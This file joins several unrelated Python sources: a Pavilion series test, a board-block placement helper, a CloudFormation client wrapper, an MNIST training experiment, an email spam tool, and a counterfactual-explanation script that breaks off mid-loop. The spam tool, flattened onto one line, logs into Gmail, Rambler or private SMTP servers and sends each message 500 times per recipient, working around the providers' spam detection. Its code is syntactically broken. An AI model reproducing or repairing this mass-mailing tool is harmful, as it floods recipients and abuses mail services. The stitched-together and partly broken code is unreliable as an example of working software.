                                 'only_if': {},
                                 'not_if': {}},
                       'set_c': {'modes': [],
                                 'tests': ['echo_test.c'],
                                 'depends_on': [],
                                 'only_if': {},
                                 'not_if': {}
                                 }
                       },
            'modes': ['smode2'],
            'simultaneous': None,
            'ordered': False,
            'restart': False,
            'host': None
        }
        outfile = io.StringIO()
        test_series_obj = series.TestSeries(self.pav_cfg,
                                            series_config=series_config,
                                            outfile=outfile,
                                            errfile=outfile)
        test_series_obj.create_dependency_graph()
        test_series_obj.create_set_graph()
        test_series_obj.run_series()
        time.sleep(0.1)
        # check if echo_test.d is skipped
        # (depends_pass=True and set_c presumably fails in this fixture —
        # confirm against the echo_test configs.)
        for test_id, test_obj in test_series_obj.tests.items():
            if test_obj.name == 'echo_test.d':
                self.assertTrue(test_obj.skipped)

    def test_series_conditionals(self):
        """Test if conditionals work as intended."""
        # only_if, not_if
        series_config = {
            'series': {'only_set': {'modes': ['smode1'],
                                    'depends_on': [],
                                    'tests': ['echo_test.wrong_year'],
                                    'only_if': {},
                                    'not_if': {}}
                       },
            'modes': ['smode2'],
            'simultaneous': None,
            'ordered': False,
            'restart': False,
            'host': None
        }
        outfile = io.StringIO()
        test_series_obj = series.TestSeries(
            self.pav_cfg,
            series_config=series_config,
            outfile=outfile,
            errfile=outfile)
        test_series_obj.create_set_graph()
        test_series_obj.run_series()
        time.sleep(0.1)
        # The conditional must skip the test, not drop it from the series.
        self.assertEqual(len(list(test_series_obj.tests.keys())), 1)
        for test_id, test_obj in test_series_obj.tests.items():
            self.assertIsNone(test_obj.results['result'])
import random

# The board is an 8x8 grid addressed by flat indexes 0..63 (row-major).
_BOARD_DIM = 8
_BOARD_CELLS = _BOARD_DIM * _BOARD_DIM

# Orientation tables: each orientation maps to four (row, col) offsets from a
# randomly chosen anchor cell.  The offsets reproduce the index arithmetic of
# the original if/elif chains (e.g. "UpperLeft" was idx, idx-8, idx-9, idx-1).
_SQUARE_OFFSETS = {
    "UpperLeft": [(0, 0), (-1, 0), (-1, -1), (0, -1)],
    "UpperRight": [(0, 0), (-1, 0), (-1, 1), (0, 1)],
    "LowerLeft": [(0, 0), (1, 0), (1, -1), (0, -1)],
    "LowerRight": [(0, 0), (1, 0), (1, 1), (0, 1)],
}

_L_OFFSETS = {
    "DownDownLeft": [(0, 0), (1, 0), (2, 0), (2, -1)],
    "DownDownRight": [(0, 0), (1, 0), (2, 0), (2, 1)],
    "UpUpRight": [(0, 0), (-1, 0), (-2, 0), (-2, 1)],
    "UpUpLeft": [(0, 0), (-1, 0), (-2, 0), (-2, -1)],
    "LeftDownDown": [(0, 0), (0, -1), (1, -1), (2, -1)],
    "LeftUpUp": [(0, 0), (0, -1), (-1, -1), (-2, -1)],
    "RightDownDown": [(0, 0), (0, 1), (1, 1), (2, 1)],
    "RightUpUp": [(0, 0), (0, 1), (-1, 1), (-2, 1)],
    "UpLeftLeft": [(0, 0), (-1, 0), (-1, -1), (-1, -2)],
    "UpRightRight": [(0, 0), (-1, 0), (-1, 1), (-1, 2)],
    "DownRightRight": [(0, 0), (1, 0), (1, 1), (1, 2)],
    "DownLeftLeft": [(0, 0), (1, 0), (1, -1), (1, -2)],
    "LeftLeftUp": [(0, 0), (0, -1), (0, -2), (-1, -2)],
    "RightRightUp": [(0, 0), (0, 1), (0, 2), (-1, 2)],
    "RightRightDown": [(0, 0), (0, 1), (0, 2), (1, 2)],
    "LeftLeftDown": [(0, 0), (0, -1), (0, -2), (1, -2)],
}

_LINE_OFFSETS = {
    "Up": [(0, 0), (-1, 0), (-2, 0), (-3, 0)],
    "Down": [(0, 0), (1, 0), (2, 0), (3, 0)],
    "Left": [(0, 0), (0, -1), (0, -2), (0, -3)],
    "Right": [(0, 0), (0, 1), (0, 2), (0, 3)],
}


def _random_shape_positions(offset_table, currentlyoccupiedpositions):
    """Pick a random orientation and anchor cell until the whole shape fits
    on the board without touching an occupied cell; return the four flat
    indexes.

    Fixes vs. the original implementation:
    * anchors are drawn with randrange over all 64 cells instead of
      randrange(63), so index 63 is reachable (off-by-one);
    * bounds are checked per row/column, so shapes can no longer silently
      wrap around the left/right board edges (the old idx±1 arithmetic
      accepted cells on the adjacent row).
    """
    occupied = set(currentlyoccupiedpositions)
    orientations = list(offset_table.values())
    while True:
        offsets = random.choice(orientations)
        anchor_row, anchor_col = divmod(random.randrange(_BOARD_CELLS),
                                        _BOARD_DIM)
        cells = []
        for d_row, d_col in offsets:
            row, col = anchor_row + d_row, anchor_col + d_col
            if not (0 <= row < _BOARD_DIM and 0 <= col < _BOARD_DIM):
                break  # falls off the board; retry with a new random pick
            index = row * _BOARD_DIM + col
            if index in occupied:
                break  # collides with an existing block; retry
            cells.append(index)
        else:
            return cells


def get_block_square_positions(currentlyoccupiedpositions):
    """Return four flat indexes forming a random 2x2 square that avoids
    `currentlyoccupiedpositions`."""
    return _random_shape_positions(_SQUARE_OFFSETS, currentlyoccupiedpositions)


def get_block_L_positions(currentlyoccupiedpositions=()):
    """Return four flat indexes forming a random L tetromino.

    `currentlyoccupiedpositions` is new and optional (default: nothing
    occupied), so existing no-argument callers keep working; the original
    version never checked occupancy at all.
    """
    return _random_shape_positions(_L_OFFSETS, currentlyoccupiedpositions)


def get_block_line_positions(currentlyoccupiedpositions):
    """Return four flat indexes forming a random 1x4 line that avoids
    `currentlyoccupiedpositions`."""
    return _random_shape_positions(_LINE_OFFSETS, currentlyoccupiedpositions)


def get_random_positions_for_blocks():
    """Place one L, one square and two lines on an empty board, in that
    order, and return the 16 mutually distinct occupied indexes."""
    allpositions = []
    occupied = set()
    for offset_table in (_L_OFFSETS, _SQUARE_OFFSETS,
                         _LINE_OFFSETS, _LINE_OFFSETS):
        placed = _random_shape_positions(offset_table, occupied)
        allpositions.extend(placed)
        occupied.update(placed)
    return allpositions
# repo: delfick/bespin
"""Thin wrapper around the boto3 CloudFormation client plus a small
status-object hierarchy that mirrors CloudFormation stack states."""
from bespin.errors import StackDoesntExist, BadStack, Throttled
from bespin.amazon.mixin import AmazonMixin
from bespin import helpers as hp

import botocore
import boto3
import datetime
import logging
import pytz
import time
import six
import os

log = logging.getLogger("bespin.amazon.cloudformation")


class StatusMeta(object):
    """Metaclass-style factory that stamps convenience flags onto a status class.

    The flags are derived purely from the class *name* (e.g. "CREATE_COMPLETE"
    -> complete=True, is_create=True), so the status constants below never
    need bodies.  Applied via six.add_metaclass in the loop at module bottom.
    """
    def __new__(cls, name, bases, attrs):
        attrs["name"] = name
        attrs["failed"] = name.endswith("FAILED")
        attrs["complete"] = name.endswith("COMPLETE")
        attrs["in_progress"] = name.endswith("IN_PROGRESS")
        attrs["cleanup_in_progress"] = name.endswith("CLEANUP_IN_PROGRESS")
        attrs["is_create"] = name.startswith("CREATE")
        attrs["is_delete"] = name.startswith("DELETE")
        # UPDATE_ROLLBACK_* counts as a rollback, not an update
        attrs["is_update"] = name.startswith("UPDATE") and not name.startswith("UPDATE_ROLLBACK")
        attrs["is_rollback"] = name.startswith("ROLLBACK") or name.startswith("UPDATE_ROLLBACK")
        return type(name, bases, attrs)


class Status(object):
    """Base class for stack statuses; ``statuses`` maps name -> status class."""
    exists = True
    statuses = {}

    @classmethod
    def find(kls, name):
        """Return the registered status class for ``name``, or synthesise one
        on the fly (covers any status AWS adds that we don't know about)."""
        if name in kls.statuses:
            return kls.statuses[name]
        return six.add_metaclass(StatusMeta)(type(name, (Status, ), {}))


class NONEXISTANT(Status): exists = False
class CREATE_IN_PROGRESS(Status): pass
class CREATE_FAILED(Status): pass
class CREATE_COMPLETE(Status): pass
class ROLLBACK_IN_PROGRESS(Status): pass
class ROLLBACK_FAILED(Status): pass
class ROLLBACK_COMPLETE(Status): pass
class DELETE_IN_PROGRESS(Status): pass
class DELETE_FAILED(Status): pass
class DELETE_COMPLETE(Status): pass
class UPDATE_IN_PROGRESS(Status): pass
class UPDATE_COMPLETE_CLEANUP_IN_PROGRESS(Status): pass
class UPDATE_COMPLETE(Status): pass
class UPDATE_ROLLBACK_IN_PROGRESS(Status): pass
class UPDATE_ROLLBACK_FAILED(Status): pass
class UPDATE_ROLLBACK_COMPLETE_CLEANUP_IN_PROGRESS(Status): pass
class UPDATE_ROLLBACK_COMPLETE(Status): pass
# REVIEW_IN_PROGRESS only valid for CreateChangeSet with ChangeSetType=CREATE
class REVIEW_IN_PROGRESS(Status): pass

# Re-create every status class through StatusMeta so the name-derived flags
# (failed/complete/...) exist, rebind the module-level names to the stamped
# versions, and register them in Status.statuses for Status.find().
for kls in [Status] + Status.__subclasses__():
    with_meta = six.add_metaclass(StatusMeta)(kls)
    locals()[kls.__name__] = with_meta
    Status.statuses[kls.__name__] = with_meta


##BOTO3 TODO: refactor to use boto3 resources
class Cloudformation(AmazonMixin):
    """Operations on a single CloudFormation stack (create/update/wait/etc.)."""

    def __init__(self, stack_name, region="ap-southeast-2"):
        self.region = region
        self.stack_name = stack_name

    @hp.memoized_property
    def conn(self):
        # boto3 cloudformation client, created once per instance
        log.info("Using region [%s] for cloudformation (%s)", self.region, self.stack_name)
        return self.session.client('cloudformation', region_name=self.region)

    @hp.memoized_property
    def session(self):
        return boto3.session.Session(region_name=self.region)

    def reset(self):
        # Drop the cached stack description so the next description() refetches
        self._description = None

    def description(self, force=False):
        """Get the descriptions for the stack

        Result is cached on the instance; pass ``force=True`` to refetch.
        Retries forever on throttling, sleeping 0.5s between attempts.
        """
        if not getattr(self, "_description", None) or force:
            with self.catch_boto_400(StackDoesntExist, "Couldn't find stack"):
                while True:
                    try:
                        with self.ignore_throttling_error():
                            response = self.conn.describe_stacks(StackName=self.stack_name)
                            self._description = response['Stacks'][0]
                            break
                    except Throttled:
                        log.info("Was throttled, waiting a bit")
                        time.sleep(0.5)
        return self._description

    @property
    def outputs(self):
        """Stack outputs as {OutputKey: OutputValue}; waits for the stack first."""
        self.wait()
        description = self.description()
        if 'Outputs' in description:
            return dict((out['OutputKey'], out['OutputValue']) for out in description['Outputs'])
        else:
            return {}

    @property
    def status(self):
        """Current stack status as a Status class.

        Forces a fresh describe_stacks on first access and at most every 3
        seconds thereafter; otherwise returns the cached description's status.
        """
        force = False
        last_status = getattr(self, "_last_status", None)
        if last_status is None:
            self._last_status = datetime.datetime.now()
            force = True
        else:
            if self._last_status + datetime.timedelta(seconds=3) < datetime.datetime.now():
                force = True
                self._last_status = None

        try:
            description = self.description(force=force)
            return Status.find(description['StackStatus'])
        except StackDoesntExist:
            return NONEXISTANT

    def map_logical_to_physical_resource_id(self, logical_id):
        """Resolve a template logical id to the deployed physical resource id."""
        response = self.conn.describe_stack_resource(StackName=self.stack_name, LogicalResourceId=logical_id)
        return response['StackResourceDetail']["PhysicalResourceId"]

    def tags_from_dict(self, tags):
        """ helper to convert python dictionary into list of AWS Tag dicts """
        return [{'Key': k, 'Value': v} for k, v in tags.items()] if tags else []

    def params_from_dict(self, params):
        """ helper to convert python dictionary into list of CloudFormation Parameter dicts """
        return [{'ParameterKey': key, 'ParameterValue': value} for key, value in params.items()] if params else []

    def create(self, template_body, params, tags=None, policy=None, role_arn=None, termination_protection=False):
        """Kick off stack creation (does not wait). Always returns True."""
        log.info("Creating stack (%s)\ttags=%s", self.stack_name, tags)
        stack_tags = self.tags_from_dict(tags)
        stack_args = {
            'StackName': self.stack_name,
            'TemplateBody': template_body,
            'Parameters': params,
            'Capabilities': ['CAPABILITY_IAM', 'CAPABILITY_NAMED_IAM'],
            # NOTE(review): env var compared against "1" with an int default 0
            # -- works (defaults to False) but the default could be "0" for clarity
            'DisableRollback': os.environ.get("DISABLE_ROLLBACK", 0) == "1",
            "EnableTerminationProtection": termination_protection,
        }
        if stack_tags:
            stack_args['Tags'] = stack_tags
        if policy:
            stack_args['StackPolicyBody'] = policy
        if role_arn:
            stack_args['RoleARN'] = role_arn
        self.conn.create_stack(**stack_args)
        return True

    def update(self, template_body, params, tags=None, policy=None, role_arn=None, termination_protection=False):
        """Update the stack and reconcile termination protection.

        Returns True if either the template update or the termination
        protection setting actually changed anything.
        """
        log.info("Updating stack (%s)\ttags=%s", self.stack_name, tags)
        stack_tags = self.tags_from_dict(tags)
        stack_args = {
            'StackName': self.stack_name,
            'TemplateBody': template_body,
            'Parameters': params,
            'Capabilities': ['CAPABILITY_IAM', 'CAPABILITY_NAMED_IAM'],
            # NOTE: DisableRollback is not supported by UpdateStack.
            # It is a property of the stack that can only be set during stack creation
        }
        if stack_tags:
            stack_args['Tags'] = stack_tags
        if policy:
            stack_args['StackPolicyBody'] = policy
        if role_arn:
            stack_args['RoleARN'] = role_arn

        changed = False
        with self.catch_boto_400(BadStack, "Couldn't update the stack", stack_name=self.stack_name):
            try:
                self.conn.update_stack(**stack_args)
                changed = True
            except botocore.exceptions.ClientError as error:
                # A no-op update is reported as an error by the API; swallow
                # only that exact message and re-raise anything else.
                if error.response['Error']['Message'] == "No updates are to be performed.":
                    log.info("No updates were necessary!")
                else:
                    raise

        with self.catch_boto_400(BadStack, "Couldn't update termination protection", stack_name=self.stack_name):
            info = self.conn.describe_stacks(StackName=self.stack_name)
            if info["Stacks"] and "EnableTerminationProtection" in info["Stacks"][0]:
                current = info["Stacks"][0]["EnableTerminationProtection"]
                if current != termination_protection:
                    log.info("Changing termination protection (%s)\ttermination_protection=%s", self.stack_name, termination_protection)
                    self.conn.update_termination_protection(StackName=self.stack_name, EnableTerminationProtection=termination_protection)
                    changed = True
            else:
                log.error("Failed to figure out if the stack currently has termination protection (%s)", self.stack_name)

        return changed

    def validate_template(self, filename):
        """Validate a local template file against the CloudFormation API."""
        with self.catch_boto_400(BadStack, "Amazon says no", stack_name=self.stack_name, filename=filename):
            # NOTE(review): file handle from open() is never closed -- consider
            # a `with open(filename) as fle:` block.
            return self.conn.validate_template(TemplateBody=open(filename).read())

    ##BOTO3 TODO: can this be refactored with client.get_waiter?
    ##BOTO3 TODO: also consider client.get_paginator('describe_stack_events')
    def wait(self, timeout=1200, rollback_is_failure=False, may_not_exist=True):
        """Block until the stack reaches a COMPLETE state, logging stack events.

        Polls every 15s up to ``timeout`` seconds.  Raises BadStack if the
        stack is failed at entry, or if it finishes failed / rolled back
        (when rollback_is_failure) / not complete.  Returns the final status.
        """
        status = self.status
        if not status.exists and may_not_exist:
            return status

        # Only events newer than this are logged each poll
        last = datetime.datetime.now(pytz.utc)

        if status.failed:
            raise BadStack("Stack is in a failed state, it must be deleted first", name=self.stack_name, status=status)

        for _ in hp.until(timeout, step=15):
            if status.exists and status.complete:
                break

            log.info("Waiting for %s - %s", self.stack_name, status.name)
            if status.exists and not status.complete:
                status = self.status
            else:
                break

            # NOTE(review): `description` is fetched but never used below
            description = self.description()

            events = []
            while True:
                try:
                    with self.ignore_throttling_error():
                        response = self.conn.describe_stack_events(StackName=self.stack_name)
                        events = response['StackEvents']
                        break
                except Throttled:
                    log.info("Was throttled, waiting a bit")
                    time.sleep(1)

            # Events come newest-first; remember the newest timestamp so the
            # next poll only logs events that arrived since this one.
            next_last = events[0]['Timestamp']
            for event in events:
                if event['Timestamp'] > last:
                    reason = event.get('ResourceStatusReason', '')
                    log.info("%s - %s %s (%s) %s", self.stack_name, event['ResourceType'], event['LogicalResourceId'], event['ResourceStatus'], reason)
            last = next_last

        status = self.status
        if status.failed or (rollback_is_failure and status.is_rollback) or not status.complete:
            raise BadStack("Stack failed to complete", final_status=status)

        return status
# repo: Luapulu/How-To-Document-Data-Science-Projects
def experiment_03():
    """
    **Model and Set-up**

    An educational and detailed tutorial addressing the training of a machine learning
    model to solve the MNIST classification Model can be found `here`_.

    For the simple one-layer neural network, we achived best results with a learning
    rate of 0.01, however, to reach better convergence we use 3000 steps.

    .. _here: https://www.oreilly.com/learning/not-another-mnist-tutorial-with-tensorflow

    In this experiment, we use TensorFlow Version 1.13.1

    **Model**

    * linear classifier (1-layer NN)

    **Parameter**

    * image_size = 28 x 28
    * labels_size = 10
    * learning_rate = 0.01
    * **steps_number = 3000**
    * batch_size = 200

    **Optimiser:**

    * tf.train.GradientDescentOptimizer

    **Results**

    Comment: Very slow convergence, because of the low learning rate

    * Step 200, training accuracy 85.50, training loss 0.58
    * Step 400, training accuracy 90.50, training loss 0.42
    * Step 600, training accuracy 92.50, training loss 0.35
    * Step 800, training accuracy 93.50, training loss 0.30
    * Step 1000, training accuracy 95.00, training loss 0.26
    * Step 1200, training accuracy 95.00, training loss 0.24
    * Step 1400, training accuracy 95.50, training loss 0.22
    * Step 1600, training accuracy 96.50, training loss 0.20
    * Step 1800, training accuracy 96.50, training loss 0.18
    * Step 2000, training accuracy 97.50, training loss 0.17
    * Step 2200, training accuracy 97.50, training loss 0.16
    * Step 2400, training accuracy 98.00, training loss 0.15
    * Step 2600, training accuracy 98.00, training loss 0.14
    * Step 2800, training accuracy 98.50, training loss 0.13
    * Step 3000, training accuracy 98.50, training loss 0.12

    Test accuracy: 86.46 %

    Validation accuracy: 88.9 %
    """
    import example_mnist.get_mnist_data as em
    import tensorflow as tf
    import numpy as np
    import os

    # Fix for MacOS openMP setup.
    # For details see: https://github.com/dmlc/xgboost/issues/1715
    os.environ['KMP_DUPLICATE_LIB_OK'] = 'True'

    # ----------------------------------------------------------------------------#
    # Get Dataset
    # ----------------------------------------------------------------------------#
    data = em.load()

    # ----------------------------------------------------------------------------#
    # Define Model
    # ----------------------------------------------------------------------------#
    image_size = data['image_size']
    labels_size = data['labels_size']
    learning_rate = 0.01
    steps_number = 3000
    batch_size = 200

    print("Using TensorFlow", tf.__version__)

    # Define placeholders
    training_data = tf.placeholder(tf.float32, [None, image_size])
    labels = tf.placeholder(tf.float32, [None, labels_size])

    # Model parameters: W and b
    W = tf.get_variable("W", shape=(image_size, labels_size), dtype=tf.float32,
                        trainable=True)
    b = tf.get_variable("b", shape=(labels_size,), dtype=tf.float32)

    # Compute predictions (logits of the linear classifier)
    output = tf.matmul(training_data, W) + b

    # Define the loss function
    loss = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(labels=labels,
                                                                  logits=output))

    # Training step
    train_step = tf.train.GradientDescentOptimizer(learning_rate).minimize(loss)

    # Accuracy calculation
    correct_prediction = tf.equal(tf.argmax(output, 1), tf.argmax(labels, 1))
    accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))

    # Run the training
    sess = tf.Session()
    sess.run(tf.global_variables_initializer())

    # An epoch is finished when we have looked at all training samples
    n_train_samples = len(data['x_train'])
    for epoch in range(steps_number):
        batch_losses = []
        # Get the next batch.
        # FIX: previously this iterated `range(0, image_size, batch_size)`,
        # which only covered the first `image_size` (=28*28) training rows per
        # epoch instead of the whole training set.
        for batch_start in range(0, n_train_samples, batch_size):
            input_batch = data['x_train'][batch_start:batch_start + batch_size]
            labels_batch = data['y_train'][batch_start:batch_start + batch_size]
            feed_dict = {training_data: input_batch, labels: labels_batch}

            _, batch_loss = sess.run([train_step, loss], feed_dict)
            # collect batch losses
            batch_losses.append(batch_loss)

        train_loss = np.mean(batch_losses)

        # ----------------------------------------------------------------------------#
        # Output Results
        # ----------------------------------------------------------------------------#
        # Print the accuracy progress on the batch every 200 epochs
        if (epoch + 1) % 200 == 0:
            train_accuracy = accuracy.eval(feed_dict=feed_dict, session=sess)
            print("Step %i, training accuracy %.2f, training loss %.2f" % (epoch + 1,
                                                                           train_accuracy * 100,
                                                                           train_loss))

    # Evaluate on the test set
    test_accuracy = accuracy.eval(feed_dict={training_data: data['x_test'],
                                             labels: data['y_test']}, session=sess)
    print()
    print("Test accuracy: %g %%" % (test_accuracy * 100))

    # Evaluate on the validation set
    validation_accuracy = accuracy.eval(feed_dict={training_data: data['x_validation'],
                                                   labels: data['y_validation']}, session=sess)
    print("Validation accuracy: %g %%" % (validation_accuracy * 100))


if __name__ == "__main__":
    experiment_03()
################################################################################################ # # # # This code is FREE to use and change at any moment, this code has no CopyRights and # # anything like that, the only thing that i ask you is to report any erros on my github # # https://github.com/Washiii/beans/issues/new if you donn't wanna report it on the # # surface web you can send me a email on <EMAIL> talking about the # # error (and do note use my on tool against me xD). Enjoy the code :) # # # # ################################################################################################ import smtplib, ssl import sys from random import randint from time import sleep from Tools.Email_Spam_Tool.msg_create import msg_create def create_private_server_connection(host, port) ########################################################################## # # # Create a connection with a private server (if the user wants to) # # Any error on this part is handled and logged. So if you have any # # problems please submit a issue. (or try to fix for yourself and # # contribute) # # # ########################################################################## global s_conneciton try: print("Creating the connection with the private server.") s_conneciton = smtplib.SMTP(host=host, port=port) if s_conneciton: print("Connection with private server done") else: print("An error on SMTP connection with the private server. Quiting.") sys.exit(0) except Exception as error: print("An error on SMTP connection with the private server. Quiting.") sys.exit(error) def create_preset_server_connection() global s_rambler global s_gmail #Creates the gmail SMTP server connection try: print("Creating the SMTP gmail connection") s_gmail = smtplib.SMTP(host='smtp.gmail.com', port=587) if s_gmail: print('Conection with gmail done!!\n') else: print("An error on SMTP connection with the gmail server. 
Quiting.") sys.exit(0) except Exception as e: print("Error on SMTP connection (gmail)") sys.exit(e) #Creates the rambler SMTP server connection try: print("Creating the SMTP rambler connection") s_rambler = smtplib.SMTP(host='smtp.rambler.ru', port=587) if s_rambler: print('Conection in rambler done!!\n') else: print("An error on SMTP connection with the rambler server. Quiting.") sys.exit(0) except Exception as e: print("Error on SMTP connection (rambler): {}".format(e)) sys.exit(0) #Yahoo removed. return True def login(server, email, password): ########################################################################### # # # Try to log in on the gmail, rambler and private server (if exist).# # Any error on this part is handled and logged. So if you have any # # problems please submit a issue. (or try to fix for yourself and # # contribute) # # # ########################################################################### if server == "gmail": if email_fail[email]: print("This email fail on the last log in, skiping it.") else: try: sleep(wait) s_gmail.connect(host='smtp.gmail.com', port=587) s_gmail.ehlo() s_gmail.starttls() s_gmail.ehlo() s_gmail.login(email, password) print("Login succefful in {}".format(email)) except Exception as e: print("Fail on login in {}. 
Error: {}".format(email, e)) email_fail.append(email) pass elif server == "rambler": if email_fail[email]: print("This email fail on the last log in, skiping it.") else: try: s_rambler.connect(host='smtp.rambler.ru', port=587) s_rambler.ehlo() s_rambler.starttls() s_rambler.ehlo() s_rambler.login(email, password) print("Login succefful in {}".format(email)) except Exception as e: print("Fail on login in {} because {}".format(email, e)) email_fail.append(email) pass elif sever == "private": if email_fail[email]: print("This email fail on the last log in, skiping it.") else: #You maybe need to change this lines according to your server specs try: s_conneciton.connect(host = private_host, port = private_port) s_conneciton.ehlo() #You can comment this and the bottom 2 lines if your server do not use tls encryption s_conneciton.starttls() s_conneciton.ehlo() if private_need_login == True: s_conneciton.login(email, password) print("Login succefful in {}".format(email)) except Exception as e: print("Fail on login in {} because {}".format(email, e)) email_fail.append(email) pass #Yahoo removed else: print("An internal error on the code happened. At the 'login' function, please report this issue on the github (https://github.com/Washiii/beans/issues/new)") return True def send_email(email_from = email, email_to, service): text = msg_create(email_from, email_to, body, load_image, image_names, subject) if service == "gmail": try: for attempt in range(0, 500): s_gmail.sendmail(email_from, email_to, text) #Try to send the email (500 per email) except Exception as e: error = str(e)tolower() if error.find('spam') >= 0: print("Unable to send email from '{}'. 
Spam detected from Gmail server.".format(email_from)) pass else: print(e) elif service == "rambler": try: for attempt in range(0, 500): s_rambler.sendmail(email_from, email_to, text) #Try to send the email (500 per email) except Exception as e: error = str(e).tolower() if error.find('spam') >= 0: print("Unable to send email from '{}'. Spam detected from Rambler server.".format(email_from)) pass else: print(e) elif service == "private": try: for attempt in range (0, private_max_trys): s_conneciton.sendmail(email_from, email_to, text) except Exception as e: error str(e)tolower() if error.find('spam') >= 0: print("Unable to send email from '{}'. Spam detected from Private server.".format(email_from)) else: print("An internal error on the code happened. At the 'send_email' function, please report this issue on the github (https://github.com/Washiii/beans/issues/new)") #TODO: verify emails domain; #get_contacts function (both to and from) #the "questions" parts to define variables like 'load_images' 'subject' and etc #main function
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Experiment: compare plain vs. "causal" (correlation-constrained)
# counterfactual explanations on several sklearn datasets, using a learned
# dictionary as a sparse-coding step.  Usage: script.py <dataset> <model>
import sys
import numpy as np
import cvxpy as cp
import matplotlib.pyplot as plt
import seaborn as sns
from sklearn.covariance import GraphicalLasso, GraphicalLassoCV
from sklearn.linear_model import LogisticRegression
from sklearn.model_selection import train_test_split
from sklearn.model_selection import KFold
from sklearn.metrics import f1_score
from sklearn.preprocessing import StandardScaler
from sklearn.decomposition import MiniBatchDictionaryLearning
from sklearn_lvq import GlvqModel
import random
np.random.seed(42)
random.seed(42)
from ceml.sklearn import generate_counterfactual

from utils import covariance_to_correlation, load_data_iris, load_data_breast_cancer, load_data_wine, load_data_digits, get_delta_overlap
from models_mp import SeparatingHyperplane, GMLVQ

n_kfold_splits = 3


if __name__ == "__main__":
    if len(sys.argv) != 3:
        print("Usage: <dataset_desc> <model_desc>")
    else:
        dataset_desc = sys.argv[1]
        model_desc = sys.argv[2]

        n_components = None
        if dataset_desc == "iris":
            X, y = load_data_iris()
        elif dataset_desc == "breastcancer":
            X, y = load_data_breast_cancer()
        elif dataset_desc == "wine":
            X, y = load_data_wine()
        elif dataset_desc == "digits":
            X, y = load_data_digits()
        labels = np.unique(y)

        n_dict_components = 10

        print(labels)
        print(f"Dimensionality: {X.shape[1]}")

        # Results:
        n_wrong_classification = 0
        n_not_found = 0
        corr_matrices = []
        original_samples = []
        counterfactuals = []
        counterfactuals_labels = []
        causal_counterfactuals = []
        counterfactual_causal_dist = []
        # NOTE(review): deltas / causal_deltas / deltas_overlap are never
        # appended to below, yet statistics over deltas_overlap are printed at
        # the end -- they will always be NaN.  Probably a missing
        # get_delta_overlap(...) call; confirm against the original experiment.
        deltas = []
        causal_deltas = []
        deltas_overlap = []

        # k-fold cross validation
        kf = KFold(n_splits=n_kfold_splits, shuffle=True)
        for train_indices, test_indices in kf.split(X):
            # NOTE(review): X[test_indices] lacks the ", :" used for the train
            # split -- equivalent for 2D arrays, just inconsistent style.
            X_train, X_test, y_train, y_test = X[train_indices, :], X[test_indices], y[train_indices], y[test_indices]
            print(f"Train size: {X_train.shape}\nTest size: {X_test.shape}")

            # Dictionary learning - smth. like "sparse coding"
            print("Learning dictionary")
            dict_learner = MiniBatchDictionaryLearning(n_components=n_dict_components, transform_algorithm='omp', n_jobs=-1, alpha=10., n_iter=1000)
            dict_learner.fit(X_train)
            X_train_coeff, X_test_coeff = dict_learner.transform(X_train), dict_learner.transform(X_test)
            dict_mat = dict_learner.components_
            # Replace the data by its reconstruction through the dictionary
            X_train, X_test = dict_learner.transform(X_train) @ dict_learner.components_, dict_learner.transform(X_test) @ dict_learner.components_
            print("Dictionary learned")

            # Preprocessing
            scaler = StandardScaler()
            X_train = scaler.fit_transform(X_train); X_test = scaler.transform(X_test); print("StandardScaler is applied to data.")

            # Fit and evaluate model
            model = None
            if model_desc == "logreg":
                model = LogisticRegression(multi_class='multinomial')
            elif model_desc == "glvq":
                model = GlvqModel(prototypes_per_class=3, max_iter=1000)
            # NOTE(review): any other model_desc leaves model=None and crashes
            # at model.fit below -- consider validating argv up front.

            cov = GraphicalLasso(alpha=.8).fit(X_train).covariance_  # Compute and turn covariance into correlation matrix
            ##cov = GraphicalLassoCV().fit(X_train).covariance_  # Compute and turn covariance into correlation matrix
            corr = covariance_to_correlation(cov)
            #corr = np.identity(X_train.shape[1])
            corr_matrices.append(corr)

            model.fit(X_train, y_train)
            y_pred = model.predict(X_test)
            print(f"F1-score: {f1_score(y_test, y_pred, average='weighted')}")
            print()

            # Compute counterfactual explanations of all test samples
            cf = None
            if model_desc == "logreg":
                cf = SeparatingHyperplane(model.coef_, model.intercept_, epsilon=1e-5)  # Object for computing causal counterfactuals
            elif model_desc == "gmlvq" or model_desc == "glvq":
                # NOTE(review): "gmlvq" is never a reachable model choice above
                cf = GMLVQ(model, epsilon=1e-2)

            n_test = X_test.shape[0]
            for i in range(n_test):
                # Get current data point, its ground truth label and compute a random target label
                x_orig, y_orig = X_test[i, :], y_test[i]
                if model.predict([x_orig]) != y_orig:
                    # Skip samples the model already misclassifies
                    n_wrong_classification += 1
                    continue

                y_target = random.choice(list(filter(lambda l: l != y_orig, labels)))

                I = np.identity(x_orig.shape[0])

                # Compute counterfactuals with and without causality constraint
                try:
                    opt = "mp"
                    regularizer = "l1"  # L2 -> All features are changed, L1 -> Only very few features are changed (huge different for causal vs. non-causal counterfactual)

                    # Without causality constraint (corr = identity)
                    opt_args = {"epsilon": 1.e-2, "solver": cp.MOSEK, "solver_verbosity": True, "max_iter": 100}
                    x_cf, delta = cf.compute_counterfactual(x_orig, y_target, corr=I, regularizer=regularizer)#, optimizer_args=opt_args)
                    if x_cf is None:
                        print("Computation of counterfactual failed!", y_target)
                        n_not_found += 1
                        continue
                    if model.predict([x_cf]) != y_target:
                        print("Wrong prediction on counterfactual")
                        continue
                    delta_cf = x_cf - x_orig

                    # With causality constraint
                    x_orig_prime = X_test_coeff[i, :] @ dict_mat  # Sparse coding via learned dictionary
                    # NOTE(review): `dict_mat_corr` is not defined anywhere in
                    # this file -- this raises NameError, which the except
                    # below swallows into n_not_found.  Likely intended
                    # something like dict_mat.T @ dict_mat or an expression
                    # involving `corr`; confirm against the paper/repo.
                    corr_prime = dict_mat.T @ dict_mat_corr
                    x_cf2, delta2 = cf.compute_counterfactual(x_orig_prime, y_target, corr=corr_prime, regularizer=regularizer)
                    if x_cf2 is None:
                        print("Computation of causal counterfactual failed!")
                        n_not_found += 1
                        continue
                    if model.predict([x_cf2]) != y_target:
                        print("Wrong prediction on counterfactual")
                        #n_wrong_classification += 1
                        continue
                    delta_cf2 = x_cf2 - x_orig

                    # Evaluate closeness, number of non-zero changes, etc.
                    original_samples.append(x_orig)
                    counterfactuals_labels.append(y_target)
                    counterfactuals.append(x_cf)
                    causal_counterfactuals.append(x_cf2)

